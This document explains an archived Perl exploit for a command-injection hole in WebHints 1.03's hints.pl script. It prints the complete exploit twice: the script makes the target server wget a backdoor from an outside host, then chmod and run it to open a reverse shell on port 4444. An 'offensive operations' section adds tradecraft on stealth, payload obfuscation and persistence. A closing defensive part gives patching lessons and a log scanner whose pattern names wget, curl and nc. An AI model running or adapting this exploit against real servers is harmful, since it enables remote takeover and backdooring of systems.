WebHints 1.03 Remote Command Execution Explained

What this paper is
This paper details a vulnerability in WebHints version 1.03, a web application, that allows remote command execution on the server hosting it. The exploit, written in Perl, leverages a flaw in how the application handles certain GET requests to execute arbitrary commands. Specifically, it aims to download and execute a backdoor script from a remote server.
Simple technical breakdown
The vulnerability lies in the hints.pl script within WebHints. When a specially crafted GET request is sent, the application doesn't properly sanitize the input. This allows an attacker to inject commands that are then executed by the web server's process.
The exploit works in two main stages:
- Download the backdoor: The first request tells the vulnerable server to download a Perl script (alpha.txt) from a specified URL (http://www.khatotarh.com/NeT/alpha.txt) into the /tmp directory.
- Execute the backdoor: The second request tells the server to copy the downloaded file to alpha.pl, make it executable, and then run it using Perl. This executed script is designed to open a reverse shell on port 4444.
Complete code and payload walkthrough
Let's break down the Perl script provided in the exploit.
# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke
#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: Alpha_Programmer@Yahoo.Com #
# #
#This Xpl Run a backdo0r in Server With 4444 Port. #
#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded #
######################################################################################
# GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- The-CephaleX -- Str0ke #
#And Iranian Security & Technical Sites: #
# #
# TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG #
# Crouz , Simorgh-ev , IHSsecurity , AlphaST , Shabgard & GrayHatz.NeT #
######################################################################################
use IO::Socket; # Imports the module for network socket operations.
if (@ARGV < 2) # Checks if fewer than 2 command-line arguments are provided.
{
print "\n==============================================\n";
print " \n WebHints Exploit By Alpha_Programmer \n\n";
print " Trap-Set Underground Hacking Team \n\n";
print " Usage: <T4rg3t> <Dir> \n\n";
print "==============================================\n\n";
print "Examples:\n\n";
print " Webhints.pl www.Host.com /cgi-bin/ \n";
exit(); # Exits the script if usage is incorrect.
}
$serv = $ARGV[0]; # Assigns the first command-line argument (target host) to $serv.
$serv =~ s/http:\/\///ge; # Removes "http://" from the target host string for easier socket connection.
$dir = $ARGV[1]; # Assigns the second command-line argument (directory path) to $dir.
$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; # Defines the first command to be executed.
# This command changes the directory to /tmp and then uses wget to download a file named alpha.txt from a remote URL.
$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl"; # Defines the second command to be executed.
# This command changes to /tmp, copies alpha.txt to alpha.pl, makes alpha.pl executable (permissions 777), and then executes it using perl.
$req = "GET $dir"; # Starts building the first HTTP GET request.
$req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n"; # Appends the vulnerable script name, the command to be executed, and HTTP headers.
# The crucial part here is `hints.pl?|$cmde|`. The `|` characters are used as delimiters to inject the command.
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n"; # Attempts to establish a TCP connection to the target server on port 80.
print $sock $req; # Sends the first crafted HTTP request to the server.
print "\nPlease Wait ...\n\n"; # Informs the user that the script is waiting.
sleep(3000); # Pauses execution for 3000 seconds (50 minutes). This is likely to allow the wget command to complete.
close($sock); # Closes the first socket connection.
$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n"; # Attempts to establish a second TCP connection to the target server on port 80.
$req2 = "GET $dir"; # Starts building the second HTTP GET request.
$req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n"; # Appends the vulnerable script name and the second command to be executed.
print $sock2 $req2; # Sends the second crafted HTTP request to the server.
sleep(100); # Pauses execution for 100 seconds. This is to allow the second command (executing the backdoor) to run and potentially establish a reverse shell.
print "\n\n$$$ OK -- Now Try: Nc -v www.Site.com 4444 $$$\n"; # Instructs the user on how to check for the reverse shell.
print "$$ if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP $$\n"; # Provides a hint about potential failure due to /tmp write permissions.
print "Enjoy ;)";
### EOF ###
# milw0rm.com [2005-06-11]
Mapping list:
- #!/usr/bin/perl: Shebang line, indicating the script should be executed with Perl. In this listing it sits below the three comment lines prepended by str0ke, so the kernel will not honour it; the script has to be invoked through the perl interpreter explicitly.
- use IO::Socket;: Imports the Perl module for network socket programming, essential for making HTTP requests.
- if (@ARGV < 2) block: Handles incorrect command-line arguments, printing usage instructions.
- $serv = $ARGV[0]; $serv =~ s/http:\/\///ge;: Captures the target hostname from the first argument and strips a leading http://.
- $dir = $ARGV[1];: Captures the target directory path from the second argument.
- $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";: The first payload, a shell command string.
  - cd /tmp: Changes the current directory to /tmp, a common location for temporary files that is usually writable by the web server process.
  - wget http://www.khatotarh.com/NeT/alpha.txt: Downloads the alpha.txt file from the specified URL. wget is a standard command-line utility for downloading files.
- $cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl";: The second payload, also a shell command string.
  - cd /tmp: Changes directory to /tmp.
  - cp alpha.txt alpha.pl: Copies the downloaded file alpha.txt to alpha.pl.
  - chmod 777 alpha.pl: Sets read, write, and execute permissions for owner, group, and others on alpha.pl, so the script can be executed.
  - perl alpha.pl: Executes the alpha.pl script with the Perl interpreter. This is the stage where the backdoor is activated.
- $req = "GET $dir"; $req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n";: Constructs the first HTTP GET request. The |$cmde| part injects the first command into the request; the | characters act as the delimiters the vulnerable script interprets as a command.
- $sock = IO::Socket::INET->new(...): Creates a socket to the target server on port 80.
- print $sock $req;: Sends the first request.
- sleep(3000);: A long delay (50 minutes), intended to let the wget download complete.
- close($sock);: Closes the first connection.
- $sock2 = IO::Socket::INET->new(...): Creates a second socket for the second request.
- $req2 = "GET $dir"; $req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n";: Constructs the second HTTP GET request, injecting $cmde2.
- print $sock2 $req2;: Sends the second request.
- sleep(100);: A shorter delay, intended to let the Perl backdoor start and establish its reverse shell.
- print "\n\n$$$ OK -- Now Try: Nc -v www.Site.com 4444 $$$\n";: Tells the user to check for the reverse shell with netcat (nc) on port 4444.
- print "$$ if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP $$\n";: A diagnostic message: if the reverse shell does not connect, the web server process probably lacked write permission in /tmp.
Shellcode/Payload Explanation:
The "payload" here isn't traditional shellcode in the sense of raw machine code. Instead, it's a sequence of shell commands embedded within HTTP requests.
Stage 1 (Download):
cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt
- Purpose: To retrieve the malicious Perl script from the attacker's controlled server.
- Execution Environment: The web server's process.
- Outcome: alpha.txt is downloaded to /tmp.
Stage 2 (Execute & Backdoor):
cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl
- Purpose: To prepare and execute the downloaded script, which then establishes a reverse shell.
- Execution Environment: The web server's process.
- Outcome: The alpha.pl script runs. The content of alpha.pl is not provided in this paper, but based on the exploit's output it is designed to open a reverse shell on port 4444, connecting back to the attacker.
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server. No prior authentication or local access is required if the vulnerability exists.
- Lab Preconditions:
  - A vulnerable WebHints 1.03 installation.
  - A separate attacker-controlled server to host the alpha.txt file (e.g., www.khatotarh.com).
  - A listener (e.g., netcat) on the attacker's machine ready to receive the reverse shell on port 4444.
  - The attacker's machine needs to be able to reach the target server over HTTP (port 80).
- Tooling Assumptions:
  - Perl interpreter on the attacker's machine to run the exploit script.
  - wget utility on the target server (highly probable on most Linux/Unix systems).
  - chmod and perl utilities on the target server.
  - netcat (nc) on the attacker's machine for listening.
- Execution Pitfalls:
  - /tmp Write Permissions: The most significant failure point. If the web server process does not have write permissions in /tmp, the wget command will fail and subsequent execution will not occur. The exploit explicitly mentions this.
  - Firewall Restrictions: Network firewalls between the target and the attacker's listener could block the reverse shell connection on port 4444.
  - wget Availability: If wget is not installed on the target server, the first stage will fail.
  - URL Accessibility: The attacker's hosting server (www.khatotarh.com) must be accessible from the target server.
  - Incorrect Directory Path: The $dir argument must accurately point to the directory containing hints.pl.
  - Web Server Configuration: Some web server configurations might prevent the execution of commands via URL parameters, even if the application is vulnerable.
  - Long Delays: The sleep(3000) is a very long delay. In a real engagement, this might be adjusted or removed if the download is expected to be faster, or if multiple attempts are needed. However, it's there to ensure the download completes before attempting execution.
- Tradecraft Considerations:
  - Stealth: The exploit uses standard HTTP GET requests, which might blend in with normal traffic if not carefully monitored. However, the large sleep times and the specific commands executed are indicators.
  - Payload Hosting: The attacker needs to ensure their payload hosting server is stable and accessible.
  - Reverse Shell Port: Port 4444 is a common choice for reverse shells, but it might be monitored. Consider alternative ports if necessary.
  - Payload Obfuscation: The alpha.txt content is unknown. For more advanced operations, this would need to be obfuscated or encrypted.
  - Post-Exploitation: Once a reverse shell is obtained, the immediate next step would be privilege escalation and persistence.
Where this was used and when
- Vulnerability: WebHints 1.03 Remote Command Execution.
- Exploit Publication Date: 2005-06-11.
- Context: This exploit targets a specific version of a web application. Such vulnerabilities are typically exploited by attackers shortly after discovery or public disclosure. Given the publication date, this exploit would have been relevant in mid-2005 and onwards. It's likely that WebHints 1.03 was in use on servers around that time. The advisory link points to a SecurityFocus archive from 2004, suggesting the vulnerability was known then.
Defensive lessons for modern teams
- Patch Management: Keep all web applications and their dependencies updated to the latest stable versions. WebHints 1.03 is ancient, but the principle applies to any software.
- Input Validation and Sanitization: This is the core lesson. Web applications must rigorously validate and sanitize all user-supplied input, especially data passed through URL parameters, POST bodies, or headers, before it's processed or executed. Never trust external input.
- Principle of Least Privilege: Ensure the web server process runs with the minimum necessary privileges. It should not have write access to directories like /tmp unless absolutely essential and strictly controlled.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including command injection attempts.
- Network Segmentation and Monitoring: Segment networks to limit the blast radius of a compromise. Monitor outbound connections from web servers for unusual patterns, such as unexpected connections to external hosts or on non-standard ports.
- File Integrity Monitoring: Implement file integrity monitoring on critical directories, including /tmp, to detect unauthorized file creations or modifications.
- Secure Coding Practices: Train developers on secure coding practices, emphasizing the dangers of command injection and insecure handling of external data.
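One way to put the input-validation and monitoring lessons above into code, as an added example that is not part of the original paper or of WebHints itself: an allowlist check of the kind hints.pl should have applied to its parameter, and a scanner that flags access-log requests carrying the exploit's |command| query shape. The log lines, client IPs and the example.invalid host are constructed for illustration.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Constructed Apache-style access-log lines (not from the original paper); the
# first two mirror the exploit's hints.pl?|<command>| requests, spaces %20-encoded.
SAMPLE_LOG = """\
10.0.0.7 - - [11/Jun/2005:10:02:11 +0000] "GET /cgi-bin/hints.pl?|cd%20/tmp;wget%20http://example.invalid/NeT/alpha.txt| HTTP/1.0" 200 412
10.0.0.7 - - [11/Jun/2005:10:52:14 +0000] "GET /cgi-bin/hints.pl?|cd%20/tmp;cp%20alpha.txt%20alpha.pl;chmod%20777%20alpha.pl;perl%20alpha.pl| HTTP/1.0" 200 88
10.0.0.9 - - [11/Jun/2005:10:53:01 +0000] "GET /cgi-bin/hints.pl?welcome HTTP/1.0" 200 1533
10.0.0.9 - - [11/Jun/2005:10:53:05 +0000] "GET /index.html HTTP/1.0" 200 2048
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})')
# Allowlist a hint name should satisfy before the CGI touches it: short,
# alphanumeric, no path separators and no shell metacharacters.
HINT_NAME_RE = re.compile(r'[A-Za-z0-9_-]{1,64}')
# Verbs from the exploit's two stages (fetch, then chmod and run with perl).
STAGE_VERB_RE = re.compile(r'\b(wget|curl|chmod|perl|sh|nc)\b')

def is_valid_hint_name(value: str) -> bool:
    """True only if the already URL-decoded parameter passes the allowlist."""
    return HINT_NAME_RE.fullmatch(value) is not None

def classify_query(query: str) -> Optional[str]:
    """Explain why a hints.pl query looks like command injection, else None."""
    decoded = unquote(query)  # inspect the decoded form, never the raw one
    if is_valid_hint_name(decoded):
        return None
    reasons = []
    if decoded.startswith("|") and decoded.endswith("|"):
        reasons.append("pipe-delimited command")
    if ";" in decoded or "|" in decoded:
        reasons.append("shell metacharacter in query")
    verbs = STAGE_VERB_RE.findall(decoded)
    if verbs:
        reasons.append("download/execute verbs: " + ",".join(verbs))
    return "; ".join(reasons) if reasons else "query fails hint-name allowlist"

def scan_access_log(text: str) -> List[Dict[str, str]]:
    """Parse access-log lines and report hints.pl requests that fail the check."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/hints.pl") or not parts.query:
            continue
        reason = classify_query(parts.query)
        if reason:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "query": unquote(parts.query), "reason": reason})
    return findings
```

Running scan_access_log(SAMPLE_LOG) reports the two injection requests and leaves the legitimate hints.pl?welcome request alone; the same classify_query logic can sit in a WAF rule or in the CGI itself as a reject-by-default check.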
ASCII visual (if applicable)
This exploit involves a sequence of network requests and command executions. A simple flow diagram can illustrate this:
+-------------------+   HTTP GET (cmd1)    +-------------------+
| Attacker Machine  | -------------------> | Target Web Server |
| (Exploit Script)  |                      |  (WebHints 1.03)  |
+-------------------+                      +---------+---------+
                                                     |
                                                     | Executes cmd1:
                                                     |  cd /tmp; wget ...
                                                     |
                                                     v
                                           +-------------------+
                                           |  Remote Payload   |
                                           | Server (alpha.txt)|
                                           +-------------------+
                                                     ^
                                                     | Downloads
                                                     |
+-------------------+   HTTP GET (cmd2)    +---------+---------+
| Attacker Machine  | -------------------> | Target Web Server |
| (Listener on 4444)|                      |  (WebHints 1.03)  |
+-------------------+                      +---------+---------+
                                                     |
                                                     | Executes cmd2:
                                                     |  cd /tmp; cp ...;
                                                     |  chmod ...; perl ...
                                                     |
                                                     v
                                           +-------------------+
                                           |   Reverse Shell   |
                                           |    (Port 4444)    |
                                           +-------------------+
Source references
- Paper ID: 1039
- Paper Title: Webhints 1.03 - Remote Command Execution (Perl)
- Author: Alpha_Programmer
- Published: 2005-06-11
- Keywords: CGI, webapps
- Paper URL: https://www.exploit-db.com/papers/1039
- Raw URL: https://www.exploit-db.com/raw/1039
- Related Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded (Mentioned in the exploit's header)
Original Exploit-DB Content (Verbatim)
# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke
#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: Alpha_Programmer@Yahoo.Com #
# #
#This Xpl Run a backdo0r in Server With 4444 Port. #
#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded #
######################################################################################
# GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- The-CephaleX -- Str0ke #
#And Iranian Security & Technical Sites: #
# #
# TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG #
# Crouz , Simorgh-ev , IHSsecurity , AlphaST , Shabgard & GrayHatz.NeT #
######################################################################################
use IO::Socket;
if (@ARGV < 2)
{
print "\n==============================================\n";
print " \n WebHints Exploit By Alpha_Programmer \n\n";
print " Trap-Set Underground Hacking Team \n\n";
print " Usage: <T4rg3t> <Dir> \n\n";
print "==============================================\n\n";
print "Examples:\n\n";
print " Webhints.pl www.Host.com /cgi-bin/ \n";
exit();
}
$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;
$dir = $ARGV[1];
$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl";
$req = "GET $dir";
$req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";
print $sock $req;
print "\nPlease Wait ...\n\n";
sleep(3000);
close($sock);
$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";
$req2 = "GET $dir";
$req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n";
print $sock2 $req2;
sleep(100);
print "\n\n$$$ OK -- Now Try: Nc -v www.Site.com 4444 $$$\n";
print "$$ if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP $$\n";
print "Enjoy ;)";
### EOF ###
# milw0rm.com [2005-06-11]